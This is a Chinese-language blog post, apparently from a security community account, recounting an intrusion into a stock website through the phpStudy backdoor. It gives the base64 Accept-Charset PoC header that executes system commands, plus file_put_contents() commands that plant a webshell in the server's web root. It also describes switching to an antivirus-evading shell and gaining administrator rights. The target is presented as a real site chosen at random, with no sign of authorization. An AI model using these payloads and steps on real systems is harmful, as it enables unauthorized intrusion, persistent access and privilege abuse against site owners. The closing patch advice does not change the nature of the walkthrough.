近期通过相关欣慰报道phpstudy发现了安全漏洞,于是被黑客就利用了,国外一名黑客利用这个phpstudy中的代码执行的后门漏洞,对某股票网站进行了渗透。
渗透过程如下:
利用某线上工具用搜索关键词去批量
在搜索出来的网站中随便找了一个某票网站
网站是这个样子的
随后利用burp
Accept-Encoding:gzip,deflate
Accept-Charset:c3lzdGVtKCJuZXQgdXNlciIpOw==
分别在请求包中添加利用的poc
Accep-Charset后面的是base64编码
成功的执行了命令,于是想着拿webshell
通过file_put_contents()写入了一句话进去
$a = '';file_put_contents('8.php',$a);echo 'ok';
写入之后访问,它拦截了我的请求,然后我访问了正常的文件index.php并没有拦截
查看了一下当前的目录,原来没写入到网站的目录下
于是执行了system("cd PHPTutorial&dir");(由于burp回显太慢于是就换了一位师傅写的工具)
查看了PHPTutorial目录下的www,应该是没写入到网站当前的目录
重新构造了语句再次写入
$a = '';file_put_contents('D:/phpStudy/PHPTutorial/www/8.php',$a);echo 'ok';
system("cd PHPTutorial/www&dir");查看一下www下的所有文件
重新尝试写入,发现还是没有写入进去,应该有防护,我把一句话木马换成了免杀的,文件名改成了index1.php
$a = ‘’;file_put_contents(‘D:/phpStudy/PHPTutorial/WWW/index1,php’,$a);
发现成功的写入了进去
执行命令的时候发现当前的权限为administrator,可直接提权!!!
所以建议看到这篇文章的朋友,一定要检测是否用了phpstudy,一定要检测一下是否存在安全漏洞,如果存在尽快升级修复,保护好自身系统安全!!!
最后喜欢我文章的朋友请加圈子关注我们,私信关键词:加群。
就会自动分享给你群号。欢迎大家加入我们的安全大家庭。提高大家的安全意识,提升大家的网络安全技能一直是我们的初衷和愿景,让我们共同成为守护信息世界的“SaFeMAN”。
还有可以关注我们微信公众号,在公众号上输入安界网,就可以关注到我们。 |